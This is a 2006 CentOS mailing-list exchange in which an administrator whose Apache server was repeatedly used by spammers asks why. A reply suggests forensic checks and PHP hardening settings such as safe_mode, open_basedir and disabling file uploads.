[CentOS] Apache Security
King, John (Greg) (LMIT-HOU)
Greg.King at lmit.com
Thu Jun 22 17:25:49 UTC 2006
Just as an fyi on a good checklist for linux (not comprehensive but a
good start)
http://www.cisecurity.org/bench_linux.html
And some good areas via google on secure centos installations.
If they do it again then it wont be your perl script obviously as you
mentioned disabling the script, but if not, is your script configured
with use strict and taint? Is every var in the script checked to ensure
the data is within an allowed range? Does the perl script rely on
third-party modules? If so you might check there as well.
The rest is an assumption that you may have php installed on the system
and someone may have used a php script as a gateway into your system.
Even though the box has been compromised you may get lucky if this is
related to apache by looking at the timestamp on the files in /tmp and
correlate those with your apache logs.
If so check your php logs as well(if you enabled it in /etc/php.ini).
Are you running in safe mode? There are some things you can do to help
reduce the amount of damage a vulnerable php script can do:
safe_mode = On
safe_mode_gid = On
safe_mode_include_dir = /path where any include files you trust reside.
Read only by apache process
safe_mode_exec_dir = /path to area where you allow any executables to be
called from php scripts
Also (not restricted to safe mode) is if this is a home server you can
also restrict where php scripts can 'roam':
open_basedir = /var/www/html (for example) will prevent php scripts
from going outside the /var/www/html area.
If your done debugging any web code set this
display_errors = off
And turn on php file logging
log_errors = On
error_log = /var/log/phplogfilename.log
Unless you need to allow file uploads turn that off too
file_uploads = Off
The same goes for treating URLs as files
allow_url_fopen = Off
Also make sure all the files in /var/www/html or whatever are not owned
by the apache process so they cannot be over-written if at all possible.
-Greg
-----Original Message-----
From: centos-bounces at centos.org [mailto:centos-bounces at centos.org] On
Behalf Of Matthew T. O'Connor
Sent: Thursday, June 22, 2006 11:53 AM
To: CentOS mailing list
Subject: [CentOS] Apache Security
Hello, I have a server running CentOS 4.3 with all the latest updates.
The server in question has been hacked by spammers a few times. The
details of the hack have been basically the same every time. I find
some directory created by the apache user account in /tmp. The new
directory contains an html file, and a list of email addresses to spam
and a perl script that spams all those email addresses with the html
file.
My question is why is this happening? Obviously it's some apache
exploit. I have removed mod_perl, that didn't help. I have now changed
the permissions on the perl executable, that might help we will see, but
that doesn't address the core problem. How is it that someone can
upload arbitrary files to my server and then execute an arbitrary
command via apache.
Is this a know problem? Have others seen it? What can I do to help
prevent this?
Thanks,
Matt
_______________________________________________
CentOS mailing list
CentOS at centos.org
http://lists.centos.org/mailman/listinfo/centos
More information about the CentOS
mailing list